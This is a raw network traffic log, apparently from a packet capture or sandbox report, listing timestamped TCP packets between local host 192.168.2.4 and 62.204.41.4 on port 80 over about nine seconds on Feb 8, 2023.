                            Feb 8, 2023 17:39:02.585609913 CET5002680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:02.585683107 CET805002562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:02.585774899 CET5002580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:02.587069988 CET5002680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:02.648411036 CET805002662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:02.651599884 CET805002662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:02.651720047 CET5002680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:02.757978916 CET5002680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:02.759617090 CET5002780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:02.821130037 CET805002662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:02.821285963 CET5002680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:02.822841883 CET805002762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:02.822990894 CET5002780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:02.823441982 CET5002780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:02.886256933 CET805002762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:02.889178991 CET805002762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:02.889261007 CET5002780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:02.997968912 CET5002780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:02.999125004 CET5002880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:03.058784008 CET805002762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:03.058901072 CET5002780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:03.060426950 CET805002862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:03.062488079 CET5002880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:03.062794924 CET5002880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:03.124270916 CET805002862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:03.128715992 CET805002862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:03.128825903 CET5002880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:03.243168116 CET5002880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:03.244139910 CET5002980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:03.304866076 CET805002862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:03.305028915 CET5002880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:03.306385040 CET805002962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:03.306636095 CET5002980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:03.307262897 CET5002980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:03.369524002 CET805002962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:03.371998072 CET805002962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:03.376002073 CET5002980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:03.493840933 CET5002980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:03.494995117 CET5003080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:03.556350946 CET805002962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:03.557259083 CET805003062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:03.557394981 CET5002980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:03.557447910 CET5003080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:03.558067083 CET5003080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:03.624269009 CET805003062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:03.626437902 CET805003062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:03.626703978 CET5003080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:03.742794991 CET5003080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:03.746615887 CET5003180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:03.805669069 CET805003062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:03.805846930 CET5003080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:03.809304953 CET805003162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:03.810033083 CET5003180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:03.810410023 CET5003180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:03.872678995 CET805003162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:03.875169992 CET805003162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:03.875292063 CET5003180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:03.993787050 CET5003180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:03.995452881 CET5003280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:04.056103945 CET805003162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:04.056250095 CET5003180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:04.057003975 CET805003262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:04.057141066 CET5003280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:04.057615995 CET5003280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:04.119339943 CET805003262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:04.124161005 CET805003262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:04.124342918 CET5003280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:04.228305101 CET5003280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:04.229645014 CET5003380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:04.290309906 CET805003262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:04.290488005 CET5003280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:04.291201115 CET805003362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:04.291321039 CET5003380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:04.293934107 CET5003380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:04.357099056 CET805003362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:04.360657930 CET805003362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:04.360827923 CET5003380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:04.481499910 CET5003380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:04.482856035 CET5003480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:04.544322968 CET805003362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:04.544394016 CET805003462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:04.544528008 CET5003380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:04.544675112 CET5003480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:04.545459032 CET5003480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:04.606987953 CET805003462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:04.609428883 CET805003462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:04.609581947 CET5003480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:04.727094889 CET5003480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:04.728367090 CET5003580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:04.788755894 CET805003462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:04.788786888 CET805003562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:04.788966894 CET5003580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:04.788975000 CET5003480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:04.790431976 CET5003580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:04.851943016 CET805003562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:04.855072975 CET805003562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:04.855201960 CET5003580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:04.964201927 CET5003580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:04.965244055 CET5003680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:05.024904966 CET805003562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:05.025065899 CET5003580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:05.026762009 CET805003662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:05.026920080 CET5003680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:05.033129930 CET5003680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:05.094793081 CET805003662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:05.098758936 CET805003662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:05.099013090 CET5003680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:05.212236881 CET5003780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:05.213385105 CET5003680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:05.273103952 CET805003762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:05.273341894 CET5003780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:05.274550915 CET5003780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:05.274854898 CET805003662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:05.274991035 CET5003680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:05.335491896 CET805003762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:05.338116884 CET805003762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:05.338314056 CET5003780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:05.460836887 CET5003780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:05.461426973 CET5003880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:05.522017956 CET805003862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:05.522073984 CET805003762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:05.522212982 CET5003880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:05.522268057 CET5003780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:05.523813009 CET5003880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:05.584479094 CET805003862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:05.587480068 CET805003862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:05.587574005 CET5003880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:05.696449041 CET5003880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:05.697616100 CET5003980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:05.757669926 CET805003862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:05.757704973 CET805003962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:05.757735968 CET5003880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:05.757808924 CET5003980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:05.758232117 CET5003980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:05.818367004 CET805003962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:05.820897102 CET805003962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:05.820975065 CET5003980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:05.929657936 CET5003980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:05.930315971 CET5004080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:05.990147114 CET805003962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:05.990266085 CET5003980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:05.990784883 CET805004062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:05.991024017 CET5004080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:05.994782925 CET5004080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:06.055305958 CET805004062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:06.061028004 CET805004062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:06.061140060 CET5004080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:06.167855024 CET5004080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:06.168955088 CET5004180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:06.232165098 CET805004062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:06.232383966 CET5004080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:06.233648062 CET805004162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:06.233794928 CET5004180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:06.234294891 CET5004180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:06.298120022 CET805004162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:06.303630114 CET805004162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:06.303751945 CET5004180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:06.417576075 CET5004180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:06.418384075 CET5004280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:06.484360933 CET805004262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:06.484625101 CET5004280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:06.484754086 CET805004162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:06.484864950 CET5004180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:06.484997034 CET5004280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:06.545525074 CET805004262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:06.547944069 CET805004262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:06.548095942 CET5004280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:06.666018009 CET5004280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:06.666748047 CET5004380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:06.726744890 CET805004262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:06.726953030 CET5004280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:06.726989985 CET805004362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:06.727117062 CET5004380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:06.727732897 CET5004380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:06.788132906 CET805004362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:06.790538073 CET805004362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:06.790724993 CET5004380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:06.906193972 CET5004380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:06.907191038 CET5004480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:06.966949940 CET805004362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:06.967036963 CET5004380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:06.967732906 CET805004462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:06.967852116 CET5004480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:06.968442917 CET5004480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:07.029000044 CET805004462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:07.031526089 CET805004462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:07.031716108 CET5004480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:07.153942108 CET5004480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:07.154653072 CET5004580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:07.214612007 CET805004462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:07.215192080 CET805004562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:07.215428114 CET5004480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:07.215466022 CET5004580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:07.221259117 CET5004580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:07.283632994 CET805004562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:07.287579060 CET805004562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:07.290565014 CET5004580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:07.399662971 CET5004580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:07.401293993 CET5004680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:07.460943937 CET805004562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:07.461186886 CET5004580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:07.464575052 CET805004662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:07.464730024 CET5004680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:07.465500116 CET5004680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:07.527776957 CET805004662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:07.531687021 CET805004662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:07.535963058 CET5004680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:07.648709059 CET5004680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:07.649404049 CET5004780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:07.709856987 CET805004762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:07.710136890 CET5004780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:07.710715055 CET5004780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:07.711083889 CET805004662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:07.711158037 CET5004680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:07.771114111 CET805004762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:07.773403883 CET805004762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:07.773586035 CET5004780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:07.882885933 CET5004780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:07.883544922 CET5004880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:07.943588972 CET805004762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:07.943761110 CET5004780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:07.945523024 CET805004862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:07.945761919 CET5004880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:07.945990086 CET5004880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:08.007204056 CET805004862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:08.009577036 CET805004862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:08.009723902 CET5004880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:08.120682001 CET5004880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:08.121360064 CET5004980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:08.182303905 CET805004962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:08.182349920 CET805004862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:08.182555914 CET5004880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:08.182583094 CET5004980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:08.183039904 CET5004980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:08.243510008 CET805004962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:08.248380899 CET805004962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:08.248454094 CET5004980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:08.353120089 CET5004980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:08.354068041 CET5005080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:08.415640116 CET805004962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:08.415767908 CET5004980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:08.416987896 CET805005062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:08.417089939 CET5005080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:08.417524099 CET5005080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:08.483230114 CET805005062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:08.483331919 CET805005062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:08.483486891 CET5005080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:08.587236881 CET5005080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:08.588768005 CET5005180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:08.650166035 CET805005062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:08.650289059 CET5005080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:08.653625011 CET805005162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:08.653822899 CET5005180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:08.654161930 CET5005180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:08.690870047 CET805004962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:08.690999985 CET5004980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:08.716315985 CET805005162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:08.718580961 CET805005162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:08.718755007 CET5005180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:08.821922064 CET5005180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:08.822840929 CET5005280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:08.886425972 CET805005262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:08.886473894 CET805005162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:08.886539936 CET5005280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:08.886583090 CET5005180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:08.886986971 CET5005280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:08.951071978 CET805005262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:08.951896906 CET805005262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:08.952171087 CET5005280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:09.057612896 CET5005280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:09.058326960 CET5005380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:09.119534016 CET805005262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:09.119621038 CET5005280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:09.120615959 CET805005362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:09.120745897 CET5005380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:09.121134043 CET5005380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:09.182403088 CET805005362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:09.187989950 CET805005362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:09.188100100 CET5005380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:09.369051933 CET5005380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:09.369751930 CET5005480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:09.432049990 CET805005362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:09.432204962 CET5005380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:09.432549953 CET805005462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:09.432651997 CET5005480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:09.433029890 CET5005480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:09.494584084 CET805005462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:09.497119904 CET805005462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:09.497239113 CET5005480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:09.649228096 CET5005480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:09.649910927 CET5005580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:09.710972071 CET805005462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:09.711070061 CET5005480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:09.712135077 CET805005562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:09.712383986 CET5005580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:09.713047981 CET5005580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:09.775430918 CET805005562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:09.778923988 CET805005562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:09.779058933 CET5005580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:09.883025885 CET5005580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:09.883744955 CET5005680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:09.947997093 CET805005562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:09.948075056 CET805005662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:09.948225021 CET5005580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:09.948276997 CET5005680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:09.948765039 CET5005680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:10.010572910 CET805005662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:10.012639046 CET805005662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:10.012856960 CET5005680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:10.118778944 CET5005680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:10.120187998 CET5005780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:10.180332899 CET805005662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:10.180490017 CET5005680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:10.181401014 CET805005762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:10.181545973 CET5005780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:10.183850050 CET5005780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:10.245242119 CET805005762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:10.249272108 CET805005762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:10.249483109 CET5005780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:10.352972031 CET5005780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:10.354248047 CET5005880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:10.418194056 CET805005762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:10.418344975 CET5005780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:10.418932915 CET805005862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:10.419078112 CET5005880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:10.419595957 CET5005880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:10.483922958 CET805005862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:10.487284899 CET805005862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:10.491981030 CET5005880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:10.602891922 CET5005880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:10.604110956 CET5005980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:10.663422108 CET805005862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:10.663710117 CET5005880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:10.664625883 CET805005962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:10.667006969 CET5005980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:10.667915106 CET5005980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:10.728432894 CET805005962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:10.730612993 CET805005962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:10.730714083 CET5005980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:10.838335037 CET5005980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:10.839973927 CET5006080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:10.901928902 CET805005962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:10.902065039 CET5005980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:10.905297995 CET805006062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:10.905466080 CET5006080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:10.906199932 CET5006080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:10.968794107 CET805006062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:10.971039057 CET805006062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:10.971131086 CET5006080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:11.086566925 CET5006080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:11.087555885 CET5006180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:11.148361921 CET805006162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:11.148657084 CET5006180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:11.149243116 CET805006062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:11.149384022 CET5006080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:11.150218964 CET5006180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:11.210980892 CET805006162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:11.214824915 CET805006162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:11.215075016 CET5006180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:11.327781916 CET5006180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:11.329091072 CET5006280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:11.391105890 CET805006162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:11.391268969 CET5006180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:11.392216921 CET805006262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:11.392338037 CET5006280192.168.2.462.204.41.4
